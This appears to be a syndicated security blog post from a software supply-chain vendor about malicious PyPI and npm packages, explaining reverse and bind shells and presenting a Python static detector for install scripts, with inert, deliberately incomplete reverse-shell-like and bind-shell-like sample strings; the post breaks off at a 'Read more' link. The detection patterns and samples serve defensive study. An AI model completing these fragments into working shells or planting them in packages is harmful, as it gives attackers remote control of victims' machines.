Malware Monthly – November 2022

Welcome to the first edition of Malware Monthly, where our teams of security researchers and developer advocates bring you the latest information on malicious and suspicious packages discovered in software registries.

For developers, staying informed about the latest security vulnerabilities and threats is essential to keeping build environments protected. This monthly publication aims to provide the information and insights you need to stay one step ahead of the bad actors and keep your projects safe.

For this November edition of Malware Monthly, our security researchers discovered and analyzed nearly 350 packages in the PyPI and npm registries flagged as malicious, suspicious, or dependency confusion proof-of-concepts. We also dug a little deeper into two of the discovered packages.

Additionally, we explored what an exploit against the OpenSSL vulnerabilities could do and how dependency management could resolve the issues.

The ones that caught our attention

We discovered packages such as tshawn-lrce and tshawn-wrce that are tainted with malicious reverse shell and bind shell scripts. If you’re not familiar with these techniques, think of a reverse shell as a setup where:

  • An attacker starts a listening server instance on a machine they control.
  • The target downloads and inadvertently executes the malicious package in their build environment.
  • The target machine becomes a client that connects to the attacker’s server.
  • The attacker gains access to the target machine and can execute commands.

Bind shells are similar in that they also establish a backdoor connection between the attacker and the target, but in this case the malicious code opens a listening port on the target machine instead of connecting out from the target to the attacker. Once that port is open, the attacker connects to it and can execute commands on the target machine.
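One defensive angle on both patterns is to statically scan a package's install-time code (setup.py, post-install hooks) for the API combinations a reverse shell or bind shell needs: outbound connect or inbound bind/listen, file-descriptor redirection, and a process spawn. The following is an added example, not Sonatype's tooling; the indicator sets are heuristics chosen here, and the three sample scripts are constructed, never executed, and deliberately incomplete (undefined names such as C2_HOST and SHELL_CMD) so the detector logic can be checked on them.

```python
import ast

# Heuristic indicator groups (assumptions for this example, not an exhaustive list).
NET_CONNECT = {"connect", "create_connection", "connect_ex"}
NET_LISTEN = {"bind", "listen", "accept"}
FD_REDIRECT = {"dup2"}
SHELL_SPAWN = {"system", "popen", "Popen", "call", "run", "spawn", "execv", "execvp"}
SPAWN_MODULES = {"subprocess", "os", "pty"}

def _call_names(tree):
    """Yield the final name of every call target in the tree (e.g. 'connect' for s.connect)."""
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            if isinstance(node.func, ast.Attribute):
                yield node.func.attr
            elif isinstance(node.func, ast.Name):
                yield node.func.id

def classify_install_script(source: str) -> dict:
    """Parse (never execute) an install script and report which indicator groups it hits
    plus a verdict: 'reverse-shell', 'bind-shell', 'suspicious' or 'clean'."""
    tree = ast.parse(source)
    names = set(_call_names(tree))
    imports = {a.name.split(".")[0] for n in ast.walk(tree)
               if isinstance(n, ast.Import) for a in n.names}
    imports |= {n.module.split(".")[0] for n in ast.walk(tree)
                if isinstance(n, ast.ImportFrom) and n.module}
    hits = {
        "connect": bool(names & NET_CONNECT) and "socket" in imports,
        "listen": bool(names & NET_LISTEN) and "socket" in imports,
        "fd_redirect": bool(names & FD_REDIRECT),
        "shell": bool(names & SHELL_SPAWN) and bool(SPAWN_MODULES & imports),
    }
    if hits["connect"] and hits["shell"]:
        verdict = "reverse-shell"      # outbound connection feeding a spawned shell
    elif hits["listen"] and hits["shell"]:
        verdict = "bind-shell"         # listening socket feeding a spawned shell
    elif any(hits.values()):
        verdict = "suspicious"         # partial pattern: worth a manual look
    else:
        verdict = "clean"
    return {"verdict": verdict, **hits}

# Constructed, inert samples: parsed only, with undefined placeholder names.
CLEAN_SETUP = 'from setuptools import setup\nsetup(name="demo", version="0.1", packages=["demo"])\n'
REVERSE_SHELL_LIKE = ("import socket, os, subprocess\ns = socket.socket()\n"
                      "s.connect((C2_HOST, C2_PORT))\nos.dup2(s.fileno(), 0)\nsubprocess.call(SHELL_CMD)\n")
BIND_SHELL_LIKE = ("import socket, subprocess\ns = socket.socket(); s.bind(('0.0.0.0', LISTEN_PORT)); s.listen(1)\n"
                   "conn, _ = s.accept()\nsubprocess.Popen(SHELL_CMD, stdin=conn.fileno())\n")
```

Run over a real package, this should be one signal among several (typosquatting distance, install-time network activity, publisher history) rather than a verdict on its own, since legitimate build scripts can also spawn processes.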

Other packages our security researchers found, such as requests-dm, fastupdate, and (Read more...)

*** This is a Security Bloggers Network syndicated blog from Sonatype Blog authored by Sonatype Developer Relations. Read the original post at: https://blog.sonatype.com/malware-monthly-november-2022